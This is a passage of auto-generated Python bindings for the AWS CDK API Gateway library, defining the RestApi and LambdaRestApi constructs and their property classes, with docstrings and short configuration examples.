:param default_method_options: Method options to use as a default for all methods created within this API unless custom options are specified. Default: - Inherited from parent.
"""
props = RestApiProps(api_key_source_type=api_key_source_type, binary_media_types=binary_media_types, clone_from=clone_from, cloud_watch_role=cloud_watch_role, deploy=deploy, deploy_options=deploy_options, description=description, domain_name=domain_name, endpoint_export_name=endpoint_export_name, endpoint_types=endpoint_types, fail_on_warnings=fail_on_warnings, minimum_compression_size=minimum_compression_size, parameters=parameters, policy=policy, rest_api_name=rest_api_name, retain_deployments=retain_deployments, default_cors_preflight_options=default_cors_preflight_options, default_integration=default_integration, default_method_options=default_method_options)
jsii.create(RestApi, self, [scope, id, props])
@jsii.member(jsii_name="fromRestApiId")
@classmethod
def from_rest_api_id(cls, scope: aws_cdk.core.Construct, id: str, rest_api_id: str) -> "IRestApi":
"""
:param scope: -
:param id: -
:param rest_api_id: -
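Example (sketch; the REST API ID shown is a hypothetical placeholder)::

    imported = apigateway.RestApi.from_rest_api_id(self, "Imported", "a1b2c3d4e5")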
"""
return jsii.sinvoke(cls, "fromRestApiId", [scope, id, rest_api_id])
@jsii.member(jsii_name="addApiKey")
def add_api_key(self, id: str) -> "IApiKey":
"""Add an ApiKey.
:param id: -
"""
return jsii.invoke(self, "addApiKey", [id])
@jsii.member(jsii_name="addDomainName")
def add_domain_name(self, id: str, *, certificate: aws_cdk.aws_certificatemanager.ICertificate, domain_name: str, endpoint_type: typing.Optional["EndpointType"]=None) -> "DomainName":
"""Defines an API Gateway domain name and maps it to this API.
:param id: The construct id.
:param options: custom domain options.
:param certificate: The reference to an AWS-managed certificate for use by the edge-optimized endpoint for the domain name. For "EDGE" domain names, the certificate needs to be in the US East (N. Virginia) region.
:param domain_name: The custom domain name for your API. Uppercase letters are not supported.
:param endpoint_type: The type of endpoint for this DomainName. Default: REGIONAL
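Example (sketch; assumes ``cert`` is an existing ``aws_certificatemanager.ICertificate``)::

    domain = api.add_domain_name("Domain",
        domain_name="api.example.com",  # hypothetical domain
        certificate=cert,
        endpoint_type=apigateway.EndpointType.REGIONAL)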
"""
options = DomainNameOptions(certificate=certificate, domain_name=domain_name, endpoint_type=endpoint_type)
return jsii.invoke(self, "addDomainName", [id, options])
@jsii.member(jsii_name="addModel")
def add_model(self, id: str, *, schema: "JsonSchema", content_type: typing.Optional[str]=None, description: typing.Optional[str]=None, model_name: typing.Optional[str]=None) -> "Model":
"""Adds a new model.
:param id: -
:param props: -
:param schema: The schema to use to transform data to one or more output formats. Specify null ({}) if you don't want to specify a schema.
:param content_type: The content type for the model. You can also force a content type in the request or response model mapping. Default: -
:param description: A description that identifies this model. Default: None
:param model_name: A name for the model. Important: if you specify a name, you cannot perform updates that require replacement of this resource. You can perform updates that require no or some interruption. If you must replace the resource, specify a new name. Default: If you don't specify a name, AWS CloudFormation generates a unique physical ID and uses that ID for the model name. For more information, see Name Type.
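Example (sketch with a minimal, hypothetical schema)::

    model = api.add_model("ResponseModel",
        content_type="application/json",
        schema=apigateway.JsonSchema(
            schema=apigateway.JsonSchemaVersion.DRAFT4,
            title="response",
            type=apigateway.JsonSchemaType.OBJECT,
            properties={
                "message": apigateway.JsonSchema(type=apigateway.JsonSchemaType.STRING)}))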
"""
props = ModelOptions(schema=schema, content_type=content_type, description=description, model_name=model_name)
return jsii.invoke(self, "addModel", [id, props])
@jsii.member(jsii_name="addRequestValidator")
def add_request_validator(self, id: str, *, request_validator_name: typing.Optional[str]=None, validate_request_body: typing.Optional[bool]=None, validate_request_parameters: typing.Optional[bool]=None) -> "RequestValidator":
"""Adds a new request validator.
:param id: -
:param props: -
:param request_validator_name: The name of this request validator. Default: None
:param validate_request_body: Indicates whether to validate the request body according to the configured schema for the targeted API and method. Default: false
:param validate_request_parameters: Indicates whether to validate request parameters. Default: false
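Example (sketch)::

    validator = api.add_request_validator("BodyValidator",
        validate_request_body=True,
        validate_request_parameters=False)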
"""
props = RequestValidatorOptions(request_validator_name=request_validator_name, validate_request_body=validate_request_body, validate_request_parameters=validate_request_parameters)
return jsii.invoke(self, "addRequestValidator", [id, props])
@jsii.member(jsii_name="addUsagePlan")
def add_usage_plan(self, id: str, *, api_key: typing.Optional["IApiKey"]=None, api_stages: typing.Optional[typing.List["UsagePlanPerApiStage"]]=None, description: typing.Optional[str]=None, name: typing.Optional[str]=None, quota: typing.Optional["QuotaSettings"]=None, throttle: typing.Optional["ThrottleSettings"]=None) -> "UsagePlan":
"""Adds a usage plan.
:param id: -
:param props: -
:param api_key: ApiKey to be associated with the usage plan. Default: none
:param api_stages: API Stages to be associated with the usage plan. Default: none
:param description: Represents usage plan purpose. Default: none
:param name: Name for this usage plan. Default: none
:param quota: Number of requests clients can make in a given time period. Default: none
:param throttle: Overall throttle settings for the API. Default: none
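Example (sketch; assumes ``key`` is an ``IApiKey`` created elsewhere, e.g. via ``addApiKey``)::

    plan = api.add_usage_plan("Plan",
        name="Basic",  # hypothetical plan name
        api_key=key,
        throttle=apigateway.ThrottleSettings(rate_limit=10, burst_limit=2))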
"""
props = UsagePlanProps(api_key=api_key, api_stages=api_stages, description=description, name=name, quota=quota, throttle=throttle)
return jsii.invoke(self, "addUsagePlan", [id, props])
@jsii.member(jsii_name="arnForExecuteApi")
def arn_for_execute_api(self, method: typing.Optional[str]=None, path: typing.Optional[str]=None, stage: typing.Optional[str]=None) -> str:
"""
:param method: The method (default ``*``).
:param path: The resource path. Must start with '/' (default ``*``)
:param stage: The stage (default ``*``).
default
:default:
"*" returns the execute API ARN for all methods/resources in
this API.
return
:return: The "execute-api" ARN.
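Example (sketch that grants a hypothetical IAM ``role`` permission to invoke "GET /books" on the "prod" stage; assumes ``aws_cdk.aws_iam`` imported as ``aws_iam``)::

    role.add_to_policy(aws_iam.PolicyStatement(
        actions=["execute-api:Invoke"],
        resources=[api.arn_for_execute_api("GET", "/books", "prod")]))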
"""
return jsii.invoke(self, "arnForExecuteApi", [method, path, stage])
@jsii.member(jsii_name="urlForPath")
def url_for_path(self, path: typing.Optional[str]=None) -> str:
"""Returns the URL for an HTTP path.
Fails if ``deploymentStage`` is not set either by ``deploy`` or explicitly.
:param path: -
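Example (sketch that surfaces the URL of a hypothetical "/books" path as a stack output)::

    aws_cdk.core.CfnOutput(self, "BooksUrl", value=api.url_for_path("/books"))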
"""
return jsii.invoke(self, "urlForPath", [path])
@jsii.member(jsii_name="validate")
def _validate(self) -> typing.List[str]:
"""Performs validation of the REST API."""
return jsii.invoke(self, "validate", [])
@property
@jsii.member(jsii_name="restApiId")
def rest_api_id(self) -> str:
"""The ID of this API Gateway RestApi."""
return jsii.get(self, "restApiId")
@property
@jsii.member(jsii_name="restApiRootResourceId")
def rest_api_root_resource_id(self) -> str:
"""The resource ID of the root resource.
attribute:
:attribute:: true
"""
return jsii.get(self, "restApiRootResourceId")
@property
@jsii.member(jsii_name="root")
def root(self) -> "IResource":
"""Represents the root resource ("/") of this API. Use it to define the API model:.
api.root.addMethod('ANY', redirectToHomePage); // "ANY /"
api.root.addResource('friends').addMethod('GET', getFriendsHandler); // "GET /friends"
"""
return jsii.get(self, "root")
@property
@jsii.member(jsii_name="url")
def url(self) -> str:
"""The deployed root URL of this REST API."""
return jsii.get(self, "url")
@property
@jsii.member(jsii_name="domainName")
def domain_name(self) -> typing.Optional["DomainName"]:
"""The domain name mapped to this API, if defined through the ``domainName`` configuration prop."""
return jsii.get(self, "domainName")
@property
@jsii.member(jsii_name="latestDeployment")
def latest_deployment(self) -> typing.Optional["Deployment"]:
"""API Gateway deployment that represents the latest changes of the API. This resource will be automatically updated every time the REST API model changes. This will be undefined if ``deploy`` is false."""
return jsii.get(self, "latestDeployment")
@property
@jsii.member(jsii_name="deploymentStage")
def deployment_stage(self) -> "Stage":
"""API Gateway stage that points to the latest deployment (if defined).
If ``deploy`` is disabled, you will need to explicitly assign this value in order to
set up integrations.
"""
return jsii.get(self, "deploymentStage")
@deployment_stage.setter
def deployment_stage(self, value: "Stage"):
return jsii.set(self, "deploymentStage", value)
class LambdaRestApi(RestApi, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.LambdaRestApi"):
"""Defines an API Gateway REST API with AWS Lambda proxy integration.
By default (when ``proxy`` is true), a greedy proxy ("{proxy+}") and an "ANY"
method are defined on the root of the API. If ``proxy`` is set to false, you will
need to explicitly add resources and methods to the API.
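Example (minimal sketch; assumes a Lambda function ``backend`` defined elsewhere)::

    api = apigateway.LambdaRestApi(self, "books-api", handler=backend)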
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, handler: aws_cdk.aws_lambda.IFunction, options: typing.Optional["RestApiProps"]=None, proxy: typing.Optional[bool]=None, api_key_source_type: typing.Optional["ApiKeySourceType"]=None, binary_media_types: typing.Optional[typing.List[str]]=None, clone_from: typing.Optional["IRestApi"]=None, cloud_watch_role: typing.Optional[bool]=None, deploy: typing.Optional[bool]=None, deploy_options: typing.Optional["StageOptions"]=None, description: typing.Optional[str]=None, domain_name: typing.Optional["DomainNameOptions"]=None, endpoint_export_name: typing.Optional[str]=None, endpoint_types: typing.Optional[typing.List["EndpointType"]]=None, fail_on_warnings: typing.Optional[bool]=None, minimum_compression_size: typing.Optional[jsii.Number]=None, parameters: typing.Optional[typing.Mapping[str,str]]=None, policy: typing.Optional[aws_cdk.aws_iam.PolicyDocument]=None, rest_api_name: typing.Optional[str]=None, retain_deployments: typing.Optional[bool]=None, default_cors_preflight_options: typing.Optional["CorsOptions"]=None, default_integration: typing.Optional["Integration"]=None, default_method_options: typing.Optional["MethodOptions"]=None) -> None:
"""
:param scope: -
:param id: -
:param props: -
:param handler: The default Lambda function that handles all requests from this API. This handler will be used as the default integration for all methods in this API, unless specified otherwise in ``addMethod``.
:param options: Default: - no options.
:param proxy: If true, route all requests to the Lambda Function. If set to false, you will need to explicitly define the API model using ``addResource`` and ``addMethod`` (or ``addProxy``). Default: true
:param api_key_source_type: The source of the API key for metering requests according to a usage plan. Default: - Metering is disabled.
:param binary_media_types: The list of binary media mime-types that are supported by the RestApi resource, such as "image/png" or "application/octet-stream". Default: - RestApi supports only UTF-8-encoded text payloads.
:param clone_from: The ID of the API Gateway RestApi resource that you want to clone. Default: - None.
:param cloud_watch_role: Automatically configure an AWS CloudWatch role for API Gateway. Default: true
:param deploy: Indicates if a Deployment should be automatically created for this API, and recreated when the API model (resources, methods) changes. Since API Gateway deployments are immutable, when this option is enabled (the default), an AWS::ApiGateway::Deployment resource will automatically be created with a logical ID that hashes the API model (methods, resources and options). This means that when the model changes, the logical ID of this CloudFormation resource will change, and a new deployment will be created. If this is set, ``latestDeployment`` will refer to the ``Deployment`` object and ``deploymentStage`` will refer to a ``Stage`` that points to this deployment. To customize the stage options, use the ``deployOptions`` property. A CloudFormation Output will also be defined with the root URL endpoint of this REST API. Default: true
:param deploy_options: Options for the API Gateway stage that will always point to the latest deployment when ``deploy`` is enabled. If ``deploy`` is disabled, this value cannot be set. Default: - Based on defaults of ``StageOptions``.
:param description: A description of the purpose of this API Gateway RestApi resource. Default: - No description.
:param domain_name: Configure a custom domain name and map it to this API. Default: - no domain name is defined, use ``addDomainName`` or directly define a ``DomainName``.
:param endpoint_export_name: Export name for the CfnOutput containing the API endpoint. Default: - when no export name is given, output will be created without export
:param endpoint_types: A list of the endpoint types of the API. Use this property when creating an API. Default: - No endpoint types.
:param fail_on_warnings: Indicates whether to roll back the resource if a warning occurs while API Gateway is creating the RestApi resource. Default: false
:param minimum_compression_size: A nullable integer used to enable compression (with a non-negative size between 0 and 10485760 (10MB) bytes, inclusive) or to disable compression (when undefined) on an API. When compression is enabled, compression or decompression is not applied to the payload if the payload size is smaller than this value. Setting it to zero allows compression for any payload size. Default: - Compression is disabled.
:param parameters: Custom header parameters for the request. Default: - No parameters.
:param policy: A policy document that contains the permissions for this RestApi. Default: - No policy.
:param rest_api_name: A name for the API Gateway RestApi resource. Default: - ID of the RestApi construct.
:param retain_deployments: Retains old deployment resources when the API changes. This allows manually reverting stages to point to old deployments via the AWS Console. Default: false
:param default_cors_preflight_options: Adds a CORS preflight OPTIONS method to this resource and all child resources. You can add CORS at the resource-level using ``addCorsPreflight``. Default: - CORS is disabled
:param default_integration: An integration to use as a default for all methods created within this API unless an integration is specified. Default: - Inherited from parent.
:param default_method_options: Method options to use as a default for all methods created within this API unless custom options are specified. Default: - Inherited from parent.
"""
props = LambdaRestApiProps(handler=handler, options=options, proxy=proxy, api_key_source_type=api_key_source_type, binary_media_types=binary_media_types, clone_from=clone_from, cloud_watch_role=cloud_watch_role, deploy=deploy, deploy_options=deploy_options, description=description, domain_name=domain_name, endpoint_export_name=endpoint_export_name, endpoint_types=endpoint_types, fail_on_warnings=fail_on_warnings, minimum_compression_size=minimum_compression_size, parameters=parameters, policy=policy, rest_api_name=rest_api_name, retain_deployments=retain_deployments, default_cors_preflight_options=default_cors_preflight_options, default_integration=default_integration, default_method_options=default_method_options)
jsii.create(LambdaRestApi, self, [scope, id, props])
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.RestApiProps", jsii_struct_bases=[ResourceOptions], name_mapping={'default_cors_preflight_options': 'defaultCorsPreflightOptions', 'default_integration': 'defaultIntegration', 'default_method_options': 'defaultMethodOptions', 'api_key_source_type': 'apiKeySourceType', 'binary_media_types': 'binaryMediaTypes', 'clone_from': 'cloneFrom', 'cloud_watch_role': 'cloudWatchRole', 'deploy': 'deploy', 'deploy_options': 'deployOptions', 'description': 'description', 'domain_name': 'domainName', 'endpoint_export_name': 'endpointExportName', 'endpoint_types': 'endpointTypes', 'fail_on_warnings': 'failOnWarnings', 'minimum_compression_size': 'minimumCompressionSize', 'parameters': 'parameters', 'policy': 'policy', 'rest_api_name': 'restApiName', 'retain_deployments': 'retainDeployments'})
class RestApiProps(ResourceOptions):
def __init__(self, *, default_cors_preflight_options: typing.Optional["CorsOptions"]=None, default_integration: typing.Optional["Integration"]=None, default_method_options: typing.Optional["MethodOptions"]=None, api_key_source_type: typing.Optional["ApiKeySourceType"]=None, binary_media_types: typing.Optional[typing.List[str]]=None, clone_from: typing.Optional["IRestApi"]=None, cloud_watch_role: typing.Optional[bool]=None, deploy: typing.Optional[bool]=None, deploy_options: typing.Optional["StageOptions"]=None, description: typing.Optional[str]=None, domain_name: typing.Optional["DomainNameOptions"]=None, endpoint_export_name: typing.Optional[str]=None, endpoint_types: typing.Optional[typing.List["EndpointType"]]=None, fail_on_warnings: typing.Optional[bool]=None, minimum_compression_size: typing.Optional[jsii.Number]=None, parameters: typing.Optional[typing.Mapping[str,str]]=None, policy: typing.Optional[aws_cdk.aws_iam.PolicyDocument]=None, rest_api_name: typing.Optional[str]=None, retain_deployments: typing.Optional[bool]=None):
"""
:param default_cors_preflight_options: Adds a CORS preflight OPTIONS method to this resource and all child resources. You can add CORS at the resource-level using ``addCorsPreflight``. Default: - CORS is disabled
:param default_integration: An integration to use as a default for all methods created within this API unless an integration is specified. Default: - Inherited from parent.
:param default_method_options: Method options to use as a default for all methods created within this API unless custom options are specified. Default: - Inherited from parent.
:param api_key_source_type: The source of the API key for metering requests according to a usage plan. Default: - Metering is disabled.
:param binary_media_types: The list of binary media mime-types that are supported by the RestApi resource, such as "image/png" or "application/octet-stream". Default: - RestApi supports only UTF-8-encoded text payloads.
:param clone_from: The ID of the API Gateway RestApi resource that you want to clone. Default: - None.
:param cloud_watch_role: Automatically configure an AWS CloudWatch role for API Gateway. Default: true
:param deploy: Indicates if a Deployment should be automatically created for this API, and recreated when the API model (resources, methods) changes. Since API Gateway deployments are immutable, when this option is enabled (the default), an AWS::ApiGateway::Deployment resource will automatically be created with a logical ID that hashes the API model (methods, resources and options). This means that when the model changes, the logical ID of this CloudFormation resource will change, and a new deployment will be created. If this is set, ``latestDeployment`` will refer to the ``Deployment`` object and ``deploymentStage`` will refer to a ``Stage`` that points to this deployment. To customize the stage options, use the ``deployOptions`` property. A CloudFormation Output will also be defined with the root URL endpoint of this REST API. Default: true
:param deploy_options: Options for the API Gateway stage that will always point to the latest deployment when ``deploy`` is enabled. If ``deploy`` is disabled, this value cannot be set. Default: - Based on defaults of ``StageOptions``.
:param description: A description of the purpose of this API Gateway RestApi resource. Default: - No description.
:param domain_name: Configure a custom domain name and map it to this API. Default: - no domain name is defined, use ``addDomainName`` or directly define a ``DomainName``.
:param endpoint_export_name: Export name for the CfnOutput containing the API endpoint. Default: - when no export name is given, output will be created without export
:param endpoint_types: A list of the endpoint types of the API. Use this property when creating an API. Default: - No endpoint types.
:param fail_on_warnings: Indicates whether to roll back the resource if a warning occurs while API Gateway is creating the RestApi resource. Default: false
:param minimum_compression_size: A nullable integer that is used to enable compression (with non-negative between 0 and 10485760 (10M) bytes, inclusive) or disable compression (when undefined) on an API. When compression is enabled, compression or decompression is not applied on the payload if the payload size is smaller than this value. Setting it to zero allows compression for any payload size. Default: - Compression is disabled.
:param parameters: Custom header parameters for the request. Default: - No parameters.
:param policy: A policy document that contains the permissions for this RestApi. Default: - No policy.
:param rest_api_name: A name for the API Gateway RestApi resource. Default: - ID of the RestApi construct.
:param retain_deployments: Retains old deployment resources when the API changes. This allows manually reverting stages to point to old deployments via the AWS Console. Default: false
"""
if isinstance(default_cors_preflight_options, dict): default_cors_preflight_options = CorsOptions(**default_cors_preflight_options)
if isinstance(default_method_options, dict): default_method_options = MethodOptions(**default_method_options)
if isinstance(deploy_options, dict): deploy_options = StageOptions(**deploy_options)
if isinstance(domain_name, dict): domain_name = DomainNameOptions(**domain_name)
self._values = {
}
if default_cors_preflight_options is not None: self._values["default_cors_preflight_options"] = default_cors_preflight_options
if default_integration is not None: self._values["default_integration"] = default_integration
if default_method_options is not None: self._values["default_method_options"] = default_method_options
if api_key_source_type is not None: self._values["api_key_source_type"] = api_key_source_type
if binary_media_types is not None: self._values["binary_media_types"] = binary_media_types
if clone_from is not None: self._values["clone_from"] = clone_from
if cloud_watch_role is not None: self._values["cloud_watch_role"] = cloud_watch_role
if deploy is not None: self._values["deploy"] = deploy
if deploy_options is not None: self._values["deploy_options"] = deploy_options
if description is not None: self._values["description"] = description
if domain_name is not None: self._values["domain_name"] = domain_name
if endpoint_export_name is not None: self._values["endpoint_export_name"] = endpoint_export_name
if endpoint_types is not None: self._values["endpoint_types"] = endpoint_types
if fail_on_warnings is not None: self._values["fail_on_warnings"] = fail_on_warnings
if minimum_compression_size is not None: self._values["minimum_compression_size"] = minimum_compression_size
if parameters is not None: self._values["parameters"] = parameters
if policy is not None: self._values["policy"] = policy
if rest_api_name is not None: self._values["rest_api_name"] = rest_api_name
if retain_deployments is not None: self._values["retain_deployments"] = retain_deployments
@property
def default_cors_preflight_options(self) -> typing.Optional["CorsOptions"]:
"""Adds a CORS preflight OPTIONS method to this resource and all child resources.
You can add CORS at the resource-level using ``addCorsPreflight``.
default
:default: - CORS is disabled
"""
return self._values.get('default_cors_preflight_options')
@property
def default_integration(self) -> typing.Optional["Integration"]:
"""An integration to use as a default for all methods created within this API unless an integration is specified.
default
:default: - Inherited from parent.
"""
return self._values.get('default_integration')
@property
def default_method_options(self) -> typing.Optional["MethodOptions"]:
"""Method options to use as a default for all methods created within this API unless custom options are specified.
default
:default: - Inherited from parent.
"""
return self._values.get('default_method_options')
@property
def api_key_source_type(self) -> typing.Optional["ApiKeySourceType"]:
"""The source of the API key for metering requests according to a usage plan.
default
:default: - Metering is disabled.
"""
return self._values.get('api_key_source_type')
@property
def binary_media_types(self) -> typing.Optional[typing.List[str]]:
"""The list of binary media mime-types that are supported by the RestApi resource, such as "image/png" or "application/octet-stream".
default
:default: - RestApi supports only UTF-8-encoded text payloads.
"""
return self._values.get('binary_media_types')
@property
def clone_from(self) -> typing.Optional["IRestApi"]:
"""The ID of the API Gateway RestApi resource that you want to clone.
default
:default: - None.
"""
return self._values.get('clone_from')
@property
def cloud_watch_role(self) -> typing.Optional[bool]:
"""Automatically configure an AWS CloudWatch role for API Gateway.
default
:default: true
"""
return self._values.get('cloud_watch_role')
@property
def deploy(self) -> typing.Optional[bool]:
"""Indicates if a Deployment should be automatically created for this API, and recreated when the API model (resources, methods) changes.
Since API Gateway deployments are immutable, when this option is enabled
(the default), an AWS::ApiGateway::Deployment resource will automatically be
created with a logical ID that hashes the API model (methods, resources
and options). This means that when the model changes, the logical ID of
this CloudFormation resource will change, and a new deployment will be
created.
If this is set, ``latestDeployment`` will refer to the ``Deployment`` object
and ``deploymentStage`` will refer to a ``Stage`` that points to this
deployment. To customize the stage options, use the ``deployOptions``
property.
A CloudFormation Output will also be defined with the root URL endpoint
of this REST API.
default
:default: true
"""
return self._values.get('deploy')
@property
def deploy_options(self) -> typing.Optional["StageOptions"]:
"""Options for the API Gateway stage that will always point to the latest deployment when ``deploy`` is enabled.
If ``deploy`` is disabled,
this value cannot be set.
default
:default: - Based on defaults of ``StageOptions``.
"""
return self._values.get('deploy_options')
@property
def description(self) -> typing.Optional[str]:
"""A description of the purpose of this API Gateway RestApi resource.
default
:default: - No description.
"""
return self._values.get('description')
@property
def domain_name(self) -> typing.Optional["DomainNameOptions"]:
"""Configure a custom domain name and map it to this API.
default
:default: - no domain name is defined, use ``addDomainName`` or directly define a ``DomainName``.
"""
return self._values.get('domain_name')
@property
def endpoint_export_name(self) -> typing.Optional[str]:
"""Export name for the CfnOutput containing the API endpoint.
default
:default: - when no export name is given, output will be created without export
"""
return self._values.get('endpoint_export_name')
@property
def endpoint_types(self) -> typing.Optional[typing.List["EndpointType"]]:
"""A list of the endpoint types of the API.
Use this property when creating
an API.
default
:default: - No endpoint types.
"""
return self._values.get('endpoint_types')
@property
def fail_on_warnings(self) -> typing.Optional[bool]:
"""Indicates whether to roll back the resource if a warning occurs while API Gateway is creating the RestApi resource.
default
:default: false
"""
return self._values.get('fail_on_warnings')
@property
def minimum_compression_size(self) -> typing.Optional[jsii.Number]:
"""A nullable integer that is used to enable compression (with non-negative between 0 and 10485760 (10M) bytes, inclusive) or disable compression (when undefined) on an API.
When compression is enabled, compression or
decompression is not applied on the payload if the payload size is
smaller than this value. Setting it to zero allows compression for any
payload size.
default
:default: - Compression is disabled.
"""
return self._values.get('minimum_compression_size')
@property
def parameters(self) -> typing.Optional[typing.Mapping[str,str]]:
"""Custom header parameters for the request.
default
:default: - No parameters.
see
:see: https://docs.aws.amazon.com/cli/latest/reference/apigateway/import-rest-api.html
"""
return self._values.get('parameters')
@property
def policy(self) -> typing.Optional[aws_cdk.aws_iam.PolicyDocument]:
"""A policy document that contains the permissions for this RestApi.
default
:default: - No policy.
"""
return self._values.get('policy')
@property
def rest_api_name(self) -> typing.Optional[str]:
"""A name for the API Gateway RestApi resource.
default
:default: - ID of the RestApi construct.
"""
return self._values.get('rest_api_name')
@property
def retain_deployments(self) -> typing.Optional[bool]:
"""Retains old deployment resources when the API changes.
This allows
manually reverting stages to point to old deployments via the AWS
Console.
default
:default: false
"""
return self._values.get('retain_deployments')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'RestApiProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.LambdaRestApiProps", jsii_struct_bases=[RestApiProps], name_mapping={'default_cors_preflight_options': 'defaultCorsPreflightOptions', 'default_integration': 'defaultIntegration', 'default_method_options': 'defaultMethodOptions', 'api_key_source_type': 'apiKeySourceType', 'binary_media_types': 'binaryMediaTypes', 'clone_from': 'cloneFrom', 'cloud_watch_role': 'cloudWatchRole', 'deploy': 'deploy', 'deploy_options': 'deployOptions', 'description': 'description', 'domain_name': 'domainName', 'endpoint_export_name': 'endpointExportName', 'endpoint_types': 'endpointTypes', 'fail_on_warnings': 'failOnWarnings', 'minimum_compression_size': 'minimumCompressionSize', 'parameters': 'parameters', 'policy': 'policy', 'rest_api_name': 'restApiName', 'retain_deployments': 'retainDeployments', 'handler': 'handler', 'options': 'options', 'proxy': 'proxy'})
class LambdaRestApiProps(RestApiProps):
def __init__(self, *, default_cors_preflight_options: typing.Optional["CorsOptions"]=None, default_integration: typing.Optional["Integration"]=None, default_method_options: typing.Optional["MethodOptions"]=None, api_key_source_type: typing.Optional["ApiKeySourceType"]=None, binary_media_types: typing.Optional[typing.List[str]]=None, clone_from: typing.Optional["IRestApi"]=None, cloud_watch_role: typing.Optional[bool]=None, deploy: typing.Optional[bool]=None, deploy_options: typing.Optional["StageOptions"]=None, description: typing.Optional[str]=None, domain_name: typing.Optional["DomainNameOptions"]=None, endpoint_export_name: typing.Optional[str]=None, endpoint_types: typing.Optional[typing.List["EndpointType"]]=None, fail_on_warnings: typing.Optional[bool]=None, minimum_compression_size: typing.Optional[jsii.Number]=None, parameters: typing.Optional[typing.Mapping[str,str]]=None, policy: typing.Optional[aws_cdk.aws_iam.PolicyDocument]=None, rest_api_name: typing.Optional[str]=None, retain_deployments: typing.Optional[bool]=None, handler: aws_cdk.aws_lambda.IFunction, options: typing.Optional["RestApiProps"]=None, proxy: typing.Optional[bool]=None):
"""
:param default_cors_preflight_options: Adds a CORS preflight OPTIONS method to this resource and all child resources. You can add CORS at the resource-level using ``addCorsPreflight``. Default: - CORS is disabled
:param default_integration: An integration to use as a default for all methods created within this API unless an integration is specified. Default: - Inherited from parent.
:param default_method_options: Method options to use as a default for all methods created within this API unless custom options are specified. Default: - Inherited from parent.
:param api_key_source_type: The source of the API key for metering requests according to a usage plan. Default: - Metering is disabled.
:param binary_media_types: The list of binary media mime-types that are supported by the RestApi resource, such as "image/png" or "application/octet-stream". Default: - RestApi supports only UTF-8-encoded text payloads.
:param clone_from: The ID of the API Gateway RestApi resource that you want to clone. Default: - None.
:param cloud_watch_role: Automatically configure an AWS CloudWatch role for API Gateway. Default: true
:param deploy: Indicates if a Deployment should be automatically created for this API, and recreated when the API model (resources, methods) changes. Since API Gateway deployments are immutable, when this option is enabled (the default), an AWS::ApiGateway::Deployment resource will automatically be created with a logical ID that hashes the API model (methods, resources and options). This means that when the model changes, the logical ID of this CloudFormation resource will change, and a new deployment will be created. If this is set, ``latestDeployment`` will refer to the ``Deployment`` object and ``deploymentStage`` will refer to a ``Stage`` that points to this deployment. To customize the stage options, use the ``deployOptions`` property. A CloudFormation Output will also be defined with the root URL endpoint of this REST API. Default: true
:param deploy_options: Options for the API Gateway stage that will always point to the latest deployment when ``deploy`` is enabled. If ``deploy`` is disabled, this value cannot be set. Default: - Based on defaults of ``StageOptions``.
:param description: A description of the purpose of this API Gateway RestApi resource. Default: - No description.
:param domain_name: Configure a custom domain name and map it to this API. Default: - no domain name is defined, use ``addDomainName`` or directly define a ``DomainName``.
:param endpoint_export_name: Export name for the CfnOutput containing the API endpoint. Default: - when no export name is given, the output will be created without an export
:param endpoint_types: A list of the endpoint types of the API. Use this property when creating an API. Default: - No endpoint types.
:param fail_on_warnings: Indicates whether to roll back the resource if a warning occurs while API Gateway is creating the RestApi resource. Default: false
:param minimum_compression_size: A nullable integer that is used to enable compression (with a non-negative value between 0 and 10485760 (10M) bytes, inclusive) or disable compression (when undefined) on an API. When compression is enabled, compression or decompression is not applied on the payload if the payload size is smaller than this value. Setting it to zero allows compression for any payload size. Default: - Compression is disabled.
:param parameters: Custom header parameters for the request. Default: - No parameters.
:param policy: A policy document that contains the permissions for this RestApi. Default: - No policy.
:param rest_api_name: A name for the API Gateway RestApi resource. Default: - ID of the RestApi construct.
:param retain_deployments: Retains old deployment resources when the API changes. This allows manually reverting stages to point to old deployments via the AWS Console. Default: false
:param handler: The default Lambda function that handles all requests from this API. This handler will be used as the default integration for all methods in this API, unless specified otherwise in ``addMethod``.
:param options: Default: - no options.
:param proxy: If true, route all requests to the Lambda Function. If set to false, you will need to explicitly define the API model using ``addResource`` and ``addMethod`` (or ``addProxy``). Default: true
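
Example (a minimal sketch; ``backend`` is a hypothetical
``aws_lambda.Function`` and ``self`` a ``Stack``)::

    # proxy=True (the default): greedily route every request to ``backend``.
    api = apigateway.LambdaRestApi(self, "widgets", handler=backend)
    # proxy=False: the API model must be defined explicitly.
    api = apigateway.LambdaRestApi(self, "widgets2", handler=backend, proxy=False)
    items = api.root.add_resource("items")
    items.add_method("GET")  # GET /items -> backend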
"""
if isinstance(default_cors_preflight_options, dict): default_cors_preflight_options = CorsOptions(**default_cors_preflight_options)
if isinstance(default_method_options, dict): default_method_options = MethodOptions(**default_method_options)
if isinstance(deploy_options, dict): deploy_options = StageOptions(**deploy_options)
if isinstance(domain_name, dict): domain_name = DomainNameOptions(**domain_name)
if isinstance(options, dict): options = RestApiProps(**options)
self._values = {
'handler': handler,
}
if default_cors_preflight_options is not None: self._values["default_cors_preflight_options"] = default_cors_preflight_options
if default_integration is not None: self._values["default_integration"] = default_integration
if default_method_options is not None: self._values["default_method_options"] = default_method_options
if api_key_source_type is not None: self._values["api_key_source_type"] = api_key_source_type
if binary_media_types is not None: self._values["binary_media_types"] = binary_media_types
if clone_from is not None: self._values["clone_from"] = clone_from
if cloud_watch_role is not None: self._values["cloud_watch_role"] = cloud_watch_role
if deploy is not None: self._values["deploy"] = deploy
if deploy_options is not None: self._values["deploy_options"] = deploy_options
if description is not None: self._values["description"] = description
if domain_name is not None: self._values["domain_name"] = domain_name
if endpoint_export_name is not None: self._values["endpoint_export_name"] = endpoint_export_name
if endpoint_types is not None: self._values["endpoint_types"] = endpoint_types
if fail_on_warnings is not None: self._values["fail_on_warnings"] = fail_on_warnings
if minimum_compression_size is not None: self._values["minimum_compression_size"] = minimum_compression_size
if parameters is not None: self._values["parameters"] = parameters
if policy is not None: self._values["policy"] = policy
if rest_api_name is not None: self._values["rest_api_name"] = rest_api_name
if retain_deployments is not None: self._values["retain_deployments"] = retain_deployments
if options is not None: self._values["options"] = options
if proxy is not None: self._values["proxy"] = proxy
